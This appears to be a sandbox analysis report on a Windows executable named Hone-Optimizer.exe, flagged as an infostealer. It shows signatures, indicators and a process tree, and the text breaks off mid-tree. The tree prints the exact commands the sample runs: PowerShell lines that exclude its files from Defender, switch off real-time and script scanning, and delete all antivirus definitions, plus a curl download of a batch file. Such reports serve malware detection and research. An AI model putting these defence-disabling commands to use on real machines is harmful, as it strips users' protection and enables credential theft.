07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

Analysis

max time kernel
56s
max time network
58s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
12-12-2024 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hone-Optimizer.exe
Size

7.7MB
MD5

baa9792a0bb9c8df5521b14e425dbe09
SHA1

1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e
SHA256

07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
SHA512

45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636
SSDEEP

98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX

Score

10^/10

defense_evasion discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2112	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2248	powershell.exe
344	powershell.exe
3992	powershell.exe
1872	powershell.exe
1916	powershell.exe
1564	powershell.exe
4264	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Hone-Optimizer.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 3 IoCs

pid	Process
2588	bound.exe
4144	rar.exe
3832	dismhost.exe

Loads dropped DLL 36 IoCs

pid	Process
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
4280	Hone-Optimizer.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe
3832	dismhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com
33	raw.githubusercontent.com
34	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com
8	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2848	tasklist.exe
3004	tasklist.exe
404	tasklist.exe
3212	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00250000000465e8-22.dat	upx
behavioral1/memory/4280-26-0x00007FFDB5AA0000-0x00007FFDB6089000-memory.dmp	upx
behavioral1/files/0x00250000000465dd-29.dat	upx
behavioral1/memory/4280-31-0x00007FFDC8C70000-0x00007FFDC8C93000-memory.dmp	upx
behavioral1/files/0x00250000000465e6-30.dat	upx
behavioral1/memory/4280-33-0x00007FFDCC9C0000-0x00007FFDCC9CF000-memory.dmp	upx
behavioral1/files/0x00250000000465e0-39.dat	upx
behavioral1/memory/4280-41-0x00007FFDC8C40000-0x00007FFDC8C6D000-memory.dmp	upx
behavioral1/files/0x00260000000465db-42.dat	upx
behavioral1/memory/4280-44-0x00007FFDC8BF0000-0x00007FFDC8C09000-memory.dmp	upx
behavioral1/files/0x00250000000465e3-45.dat	upx
behavioral1/memory/4280-48-0x00007FFDC5720000-0x00007FFDC5743000-memory.dmp	upx
behavioral1/files/0x00250000000465eb-47.dat	upx
behavioral1/memory/4280-50-0x00007FFDB5920000-0x00007FFDB5A97000-memory.dmp	upx
behavioral1/files/0x00250000000465e2-51.dat	upx
behavioral1/memory/4280-53-0x00007FFDC5700000-0x00007FFDC5719000-memory.dmp	upx
behavioral1/files/0x00250000000465ea-54.dat	upx
behavioral1/memory/4280-56-0x00007FFDC9C70000-0x00007FFDC9C7D000-memory.dmp	upx
behavioral1/files/0x00250000000465e4-57.dat	upx
behavioral1/files/0x00250000000465e5-59.dat	upx
behavioral1/memory/4280-61-0x00007FFDC4CE0000-0x00007FFDC4D13000-memory.dmp	upx
behavioral1/files/0x00250000000465e7-60.dat	upx
behavioral1/memory/4280-66-0x00007FFDC4C10000-0x00007FFDC4CDD000-memory.dmp	upx
behavioral1/memory/4280-65-0x00007FFDB5AA0000-0x00007FFDB6089000-memory.dmp	upx
behavioral1/memory/4280-69-0x00007FFDC8C70000-0x00007FFDC8C93000-memory.dmp	upx
behavioral1/files/0x00250000000465e1-72.dat	upx
behavioral1/memory/4280-77-0x00007FFDC8C30000-0x00007FFDC8C3D000-memory.dmp	upx
behavioral1/files/0x00250000000465ec-78.dat	upx
behavioral1/memory/4280-80-0x00007FFDB52E0000-0x00007FFDB53FC000-memory.dmp	upx
behavioral1/memory/4280-73-0x00007FFDC56E0000-0x00007FFDC56F4000-memory.dmp	upx
behavioral1/files/0x00250000000465df-71.dat	upx
behavioral1/memory/4280-67-0x00007FFDB5400000-0x00007FFDB5920000-memory.dmp	upx
behavioral1/memory/4280-93-0x00007FFDC5720000-0x00007FFDC5743000-memory.dmp	upx
behavioral1/memory/4280-115-0x00007FFDB5920000-0x00007FFDB5A97000-memory.dmp	upx
behavioral1/memory/4280-120-0x00007FFDC5700000-0x00007FFDC5719000-memory.dmp	upx
behavioral1/memory/4280-207-0x00007FFDC4CE0000-0x00007FFDC4D13000-memory.dmp	upx
behavioral1/memory/4280-236-0x00007FFDB5400000-0x00007FFDB5920000-memory.dmp	upx
behavioral1/memory/4280-235-0x00007FFDC4C10000-0x00007FFDC4CDD000-memory.dmp	upx
behavioral1/memory/4280-264-0x00007FFDB5AA0000-0x00007FFDB6089000-memory.dmp	upx
behavioral1/memory/4280-265-0x00007FFDC8C70000-0x00007FFDC8C93000-memory.dmp	upx
behavioral1/memory/4280-270-0x00007FFDB5920000-0x00007FFDB5A97000-memory.dmp	upx
behavioral1/memory/4280-315-0x00007FFDC8C70000-0x00007FFDC8C93000-memory.dmp	upx
behavioral1/memory/4280-319-0x00007FFDC5720000-0x00007FFDC5743000-memory.dmp	upx
behavioral1/memory/4280-327-0x00007FFDC8C30000-0x00007FFDC8C3D000-memory.dmp	upx
behavioral1/memory/4280-328-0x00007FFDB52E0000-0x00007FFDB53FC000-memory.dmp	upx
behavioral1/memory/4280-326-0x00007FFDC56E0000-0x00007FFDC56F4000-memory.dmp	upx
behavioral1/memory/4280-325-0x00007FFDB5400000-0x00007FFDB5920000-memory.dmp	upx
behavioral1/memory/4280-324-0x00007FFDC4C10000-0x00007FFDC4CDD000-memory.dmp	upx
behavioral1/memory/4280-323-0x00007FFDC4CE0000-0x00007FFDC4D13000-memory.dmp	upx
behavioral1/memory/4280-322-0x00007FFDC9C70000-0x00007FFDC9C7D000-memory.dmp	upx
behavioral1/memory/4280-321-0x00007FFDC5700000-0x00007FFDC5719000-memory.dmp	upx
behavioral1/memory/4280-320-0x00007FFDB5920000-0x00007FFDB5A97000-memory.dmp	upx
behavioral1/memory/4280-318-0x00007FFDC8BF0000-0x00007FFDC8C09000-memory.dmp	upx
behavioral1/memory/4280-317-0x00007FFDC8C40000-0x00007FFDC8C6D000-memory.dmp	upx
behavioral1/memory/4280-316-0x00007FFDCC9C0000-0x00007FFDCC9CF000-memory.dmp	upx
behavioral1/memory/4280-300-0x00007FFDB5AA0000-0x00007FFDB6089000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a535500cd53f9d610000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a535500c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a535500c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da535500c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a535500c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1056	WMIC.exe
4708	WMIC.exe
1028	WMIC.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
1608	taskkill.exe
3684	taskkill.exe
3600	taskkill.exe
1276	taskkill.exe
2112	taskkill.exe
3304	taskkill.exe
344	taskkill.exe
944	taskkill.exe
2844	taskkill.exe
5004	taskkill.exe
4556	taskkill.exe
4468	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4532	reg.exe
1136	reg.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
3992	powershell.exe
3992	powershell.exe
2248	powershell.exe
2248	powershell.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
2248	powershell.exe
3992	powershell.exe
344	powershell.exe
344	powershell.exe
344	powershell.exe
1056	WMIC.exe
1056	WMIC.exe
1056	WMIC.exe
1056	WMIC.exe
4708	WMIC.exe
4708	WMIC.exe
4708	WMIC.exe
4708	WMIC.exe
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
1872	powershell.exe
1872	powershell.exe
3348	powershell.exe
3348	powershell.exe
1896	WMIC.exe
1896	WMIC.exe
1896	WMIC.exe
1896	WMIC.exe
1992	WMIC.exe
1992	WMIC.exe
1992	WMIC.exe
1992	WMIC.exe
5108	WMIC.exe
5108	WMIC.exe
5108	WMIC.exe
5108	WMIC.exe
1916	powershell.exe
1916	powershell.exe
1028	WMIC.exe
1028	WMIC.exe
1028	WMIC.exe
1028	WMIC.exe
1528	powershell.exe
1528	powershell.exe
1564	powershell.exe
1564	powershell.exe
4264	powershell.exe
4264	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	tasklist.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeIncreaseQuotaPrivilege	1520	WMIC.exe
Token: SeSecurityPrivilege	1520	WMIC.exe
Token: SeTakeOwnershipPrivilege	1520	WMIC.exe
Token: SeLoadDriverPrivilege	1520	WMIC.exe
Token: SeSystemProfilePrivilege	1520	WMIC.exe
Token: SeSystemtimePrivilege	1520	WMIC.exe
Token: SeProfSingleProcessPrivilege	1520	WMIC.exe
Token: SeIncBasePriorityPrivilege	1520	WMIC.exe
Token: SeCreatePagefilePrivilege	1520	WMIC.exe
Token: SeBackupPrivilege	1520	WMIC.exe
Token: SeRestorePrivilege	1520	WMIC.exe
Token: SeShutdownPrivilege	1520	WMIC.exe
Token: SeDebugPrivilege	1520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1520	WMIC.exe
Token: SeRemoteShutdownPrivilege	1520	WMIC.exe
Token: SeUndockPrivilege	1520	WMIC.exe
Token: SeManageVolumePrivilege	1520	WMIC.exe
Token: 33	1520	WMIC.exe
Token: 34	1520	WMIC.exe
Token: 35	1520	WMIC.exe
Token: 36	1520	WMIC.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeIncreaseQuotaPrivilege	1520	WMIC.exe
Token: SeSecurityPrivilege	1520	WMIC.exe
Token: SeTakeOwnershipPrivilege	1520	WMIC.exe
Token: SeLoadDriverPrivilege	1520	WMIC.exe
Token: SeSystemProfilePrivilege	1520	WMIC.exe
Token: SeSystemtimePrivilege	1520	WMIC.exe
Token: SeProfSingleProcessPrivilege	1520	WMIC.exe
Token: SeIncBasePriorityPrivilege	1520	WMIC.exe
Token: SeCreatePagefilePrivilege	1520	WMIC.exe
Token: SeBackupPrivilege	1520	WMIC.exe
Token: SeRestorePrivilege	1520	WMIC.exe
Token: SeShutdownPrivilege	1520	WMIC.exe
Token: SeDebugPrivilege	1520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1520	WMIC.exe
Token: SeRemoteShutdownPrivilege	1520	WMIC.exe
Token: SeUndockPrivilege	1520	WMIC.exe
Token: SeManageVolumePrivilege	1520	WMIC.exe
Token: 33	1520	WMIC.exe
Token: 34	1520	WMIC.exe
Token: 35	1520	WMIC.exe
Token: 36	1520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3992	powershell.exe
Token: SeSecurityPrivilege	3992	powershell.exe
Token: SeTakeOwnershipPrivilege	3992	powershell.exe
Token: SeLoadDriverPrivilege	3992	powershell.exe
Token: SeSystemProfilePrivilege	3992	powershell.exe
Token: SeSystemtimePrivilege	3992	powershell.exe
Token: SeProfSingleProcessPrivilege	3992	powershell.exe
Token: SeIncBasePriorityPrivilege	3992	powershell.exe
Token: SeCreatePagefilePrivilege	3992	powershell.exe
Token: SeBackupPrivilege	3992	powershell.exe
Token: SeRestorePrivilege	3992	powershell.exe
Token: SeShutdownPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeSystemEnvironmentPrivilege	3992	powershell.exe
Token: SeRemoteShutdownPrivilege	3992	powershell.exe
Token: SeUndockPrivilege	3992	powershell.exe
Token: SeManageVolumePrivilege	3992	powershell.exe
Token: 33	3992	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 548 wrote to memory of 4280	548	Hone-Optimizer.exe	89
PID 548 wrote to memory of 4280	548	Hone-Optimizer.exe	89
PID 4280 wrote to memory of 4440	4280	Hone-Optimizer.exe	91
PID 4280 wrote to memory of 4440	4280	Hone-Optimizer.exe	91
PID 4280 wrote to memory of 4072	4280	Hone-Optimizer.exe	92
PID 4280 wrote to memory of 4072	4280	Hone-Optimizer.exe	92
PID 4280 wrote to memory of 4376	4280	Hone-Optimizer.exe	93
PID 4280 wrote to memory of 4376	4280	Hone-Optimizer.exe	93
PID 4280 wrote to memory of 1592	4280	Hone-Optimizer.exe	94
PID 4280 wrote to memory of 1592	4280	Hone-Optimizer.exe	94
PID 4280 wrote to memory of 4136	4280	Hone-Optimizer.exe	99
PID 4280 wrote to memory of 4136	4280	Hone-Optimizer.exe	99
PID 4280 wrote to memory of 4776	4280	Hone-Optimizer.exe	101
PID 4280 wrote to memory of 4776	4280	Hone-Optimizer.exe	101
PID 4072 wrote to memory of 3992	4072	cmd.exe	103
PID 4072 wrote to memory of 3992	4072	cmd.exe	103
PID 4136 wrote to memory of 2848	4136	cmd.exe	104
PID 4136 wrote to memory of 2848	4136	cmd.exe	104
PID 1592 wrote to memory of 2588	1592	cmd.exe	105
PID 1592 wrote to memory of 2588	1592	cmd.exe	105
PID 4376 wrote to memory of 2248	4376	cmd.exe	108
PID 4376 wrote to memory of 2248	4376	cmd.exe	108
PID 4776 wrote to memory of 1520	4776	cmd.exe	109
PID 4776 wrote to memory of 1520	4776	cmd.exe	109
PID 4440 wrote to memory of 344	4440	cmd.exe	110
PID 4440 wrote to memory of 344	4440	cmd.exe	110
PID 2588 wrote to memory of 4116	2588	bound.exe	111
PID 2588 wrote to memory of 4116	2588	bound.exe	111
PID 4116 wrote to memory of 4704	4116	cmd.exe	112
PID 4116 wrote to memory of 4704	4116	cmd.exe	112
PID 4280 wrote to memory of 2708	4280	Hone-Optimizer.exe	114
PID 4280 wrote to memory of 2708	4280	Hone-Optimizer.exe	114
PID 4116 wrote to memory of 4532	4116	cmd.exe	117
PID 4116 wrote to memory of 4532	4116	cmd.exe	117
PID 2708 wrote to memory of 4180	2708	cmd.exe	118
PID 2708 wrote to memory of 4180	2708	cmd.exe	118
PID 4280 wrote to memory of 3840	4280	Hone-Optimizer.exe	119
PID 4280 wrote to memory of 3840	4280	Hone-Optimizer.exe	119
PID 4116 wrote to memory of 3600	4116	cmd.exe	188
PID 4116 wrote to memory of 3600	4116	cmd.exe	188
PID 4116 wrote to memory of 1612	4116	cmd.exe	122
PID 4116 wrote to memory of 1612	4116	cmd.exe	122
PID 4116 wrote to memory of 1136	4116	cmd.exe	123
PID 4116 wrote to memory of 1136	4116	cmd.exe	123
PID 3840 wrote to memory of 5116	3840	cmd.exe	124
PID 3840 wrote to memory of 5116	3840	cmd.exe	124
PID 4116 wrote to memory of 4940	4116	cmd.exe	140
PID 4116 wrote to memory of 4940	4116	cmd.exe	140
PID 4280 wrote to memory of 2408	4280	Hone-Optimizer.exe	126
PID 4280 wrote to memory of 2408	4280	Hone-Optimizer.exe	126
PID 2408 wrote to memory of 1056	2408	cmd.exe	128
PID 2408 wrote to memory of 1056	2408	cmd.exe	128
PID 4280 wrote to memory of 3496	4280	Hone-Optimizer.exe	149
PID 4280 wrote to memory of 3496	4280	Hone-Optimizer.exe	149
PID 3496 wrote to memory of 4708	3496	cmd.exe	168
PID 3496 wrote to memory of 4708	3496	cmd.exe	168
PID 4072 wrote to memory of 2112	4072	cmd.exe	161
PID 4072 wrote to memory of 2112	4072	cmd.exe	161
PID 4280 wrote to memory of 4964	4280	Hone-Optimizer.exe	133
PID 4280 wrote to memory of 4964	4280	Hone-Optimizer.exe	133
PID 4280 wrote to memory of 1392	4280	Hone-Optimizer.exe	134
PID 4280 wrote to memory of 1392	4280	Hone-Optimizer.exe	134
PID 4964 wrote to memory of 3004	4964	cmd.exe	137
PID 4964 wrote to memory of 3004	4964	cmd.exe	137

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
632	attrib.exe
1772	attrib.exe

cURL User-Agent 1 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	34	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:548
- C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
  "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3992
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2588
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2035.tmp\2036.tmp\2037.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4116
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4704
      - C:\Windows\system32\reg.exe
        
        reg add HKLM /F
        6⤵
        Modifies registry key
        
        PID:4532
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
        6⤵
        
        PID:1612
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:1136
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:4940
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:1700
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v "Disclaimer" /f
        6⤵
        
        PID:4088
      - C:\Windows\system32\curl.exe
        
        curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
        6⤵
        
        PID:4212
      - C:\Windows\system32\Dism.exe
        
        dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
        6⤵
        Drops file in Windows directory
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\C227B214-7FAE-40CC-B15E-C508DBD00EA8\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\C227B214-7FAE-40CC-B15E-C508DBD00EA8\dismhost.exe {72741783-E3A2-4EED-940D-CEEE0388B5FC}
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:3832
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
        6⤵
        
        PID:3444
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1564
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c date /t
        6⤵
        
        PID:464
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\12.12.2024\HKLM.reg /y
        6⤵
        
        PID:3112
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\12.12.2024\HKCU.reg /y
        6⤵
        
        PID:3752
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4372
      - C:\Windows\System32\choice.exe
        
        C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
        6⤵
        
        PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3840
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
